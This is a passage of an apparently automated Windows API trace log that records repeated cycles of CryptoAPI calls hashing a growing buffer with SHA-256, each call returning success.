(hProv=0x304f30, dwFlags=0x0) returned 1 [0230.839] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.840] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.840] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x160, dwFlags=0x0) returned 1 [0230.840] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.840] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f5b0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f5b0, pdwDataLen=0x12e8b8) returned 1 [0230.840] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.840] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.840] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.840] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.841] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x180, dwFlags=0x0) returned 1 [0230.841] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.841] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f5e0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f5e0, pdwDataLen=0x12e8b8) returned 1 [0230.841] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.841] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.841] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.841] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.841] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0230.841] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.841] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f610, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f610, pdwDataLen=0x12e8b8) returned 1 [0230.841] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.841] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.841] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.842] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.842] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0230.842] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.842] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f640, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f640, pdwDataLen=0x12e8b8) returned 1 [0230.842] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.842] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.842] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.843] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.843] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0230.843] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.843] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f670, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f670, pdwDataLen=0x12e8b8) returned 1 [0230.843] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.843] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.843] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.843] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.843] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x200, dwFlags=0x0) returned 1 [0230.843] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.843] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f6a0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f6a0, pdwDataLen=0x12e8b8) returned 1 [0230.843] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.843] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.843] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.844] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.844] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x220, dwFlags=0x0) returned 1 [0230.844] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.844] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f6d0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f6d0, pdwDataLen=0x12e8b8) returned 1 [0230.844] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.844] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.844] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.845] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.845] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x240, dwFlags=0x0) returned 1 [0230.845] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.845] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f700, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f700, pdwDataLen=0x12e8b8) returned 1 [0230.845] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.845] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.845] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.845] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.845] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x260, dwFlags=0x0) returned 1 [0230.845] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.846] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f730, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f730, pdwDataLen=0x12e8b8) returned 1 [0230.846] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.846] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.846] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.846] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.846] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x280, dwFlags=0x0) returned 1 [0230.846] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.846] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f760, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f760, pdwDataLen=0x12e8b8) returned 1 [0230.846] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.846] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.846] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.847] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.847] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0230.847] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.847] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f790, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f790, pdwDataLen=0x12e8b8) returned 1 [0230.847] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.847] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.847] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.847] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.847] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0230.847] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.847] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f7c0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f7c0, pdwDataLen=0x12e8b8) returned 1 [0230.847] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.847] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.848] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.848] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.848] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0230.848] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.848] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f7f0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f7f0, pdwDataLen=0x12e8b8) returned 1 [0230.848] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.848] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.848] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.848] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.848] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x300, dwFlags=0x0) returned 1 [0230.849] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.849] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f820, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f820, pdwDataLen=0x12e8b8) returned 1 [0230.849] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.849] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.849] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.849] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.849] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x320, dwFlags=0x0) returned 1 [0230.849] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.849] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f850, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f850, pdwDataLen=0x12e8b8) returned 1 [0230.849] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.849] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.849] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.850] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.850] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x340, dwFlags=0x0) returned 1 [0230.850] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.850] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f880, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f880, pdwDataLen=0x12e8b8) returned 1 [0230.850] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.850] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.850] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.851] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.851] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x360, dwFlags=0x0) returned 1 [0230.851] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.851] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f8b0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f8b0, pdwDataLen=0x12e8b8) returned 1 [0230.851] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.851] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.851] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.851] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.851] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x380, dwFlags=0x0) returned 1 [0230.851] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.851] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f8e0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f8e0, pdwDataLen=0x12e8b8) returned 1 [0230.851] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.851] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.851] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.852] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.852] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0230.852] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.852] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f910, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f910, pdwDataLen=0x12e8b8) returned 1 [0230.852] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.852] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.852] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.852] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.852] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0230.852] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.852] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f940, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f940, pdwDataLen=0x12e8b8) returned 1 [0230.852] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.853] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.853] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.853] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.853] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0230.853] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.853] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f970, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f970, pdwDataLen=0x12e8b8) returned 1 [0230.853] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.853] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.853] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.853] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.853] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x400, dwFlags=0x0) returned 1 [0230.854] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.854] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f9a0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f9a0, pdwDataLen=0x12e8b8) returned 1 [0230.854] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.854] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.854] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.854] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.854] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x420, dwFlags=0x0) returned 1 [0230.854] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.854] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31f9d0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31f9d0, pdwDataLen=0x12e8b8) returned 1 [0230.854] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.854] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.854] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.855] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.855] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x440, dwFlags=0x0) returned 1 [0230.855] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.855] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fa00, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fa00, pdwDataLen=0x12e8b8) returned 1 [0230.855] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.855] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.855] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.855] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.855] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x460, dwFlags=0x0) returned 1 [0230.855] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.855] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fa30, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fa30, pdwDataLen=0x12e8b8) returned 1 [0230.855] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.855] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.855] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.856] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.856] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x480, dwFlags=0x0) returned 1 [0230.856] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.856] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fa60, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fa60, pdwDataLen=0x12e8b8) returned 1 [0230.856] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.856] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.856] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.856] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.856] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0230.856] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.856] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fa90, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fa90, pdwDataLen=0x12e8b8) returned 1 [0230.856] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.856] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.856] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.857] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.857] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0230.857] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.857] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x31fac0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x31fac0, pdwDataLen=0x12e8b8) returned 1 [0230.857] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.857] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.857] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, 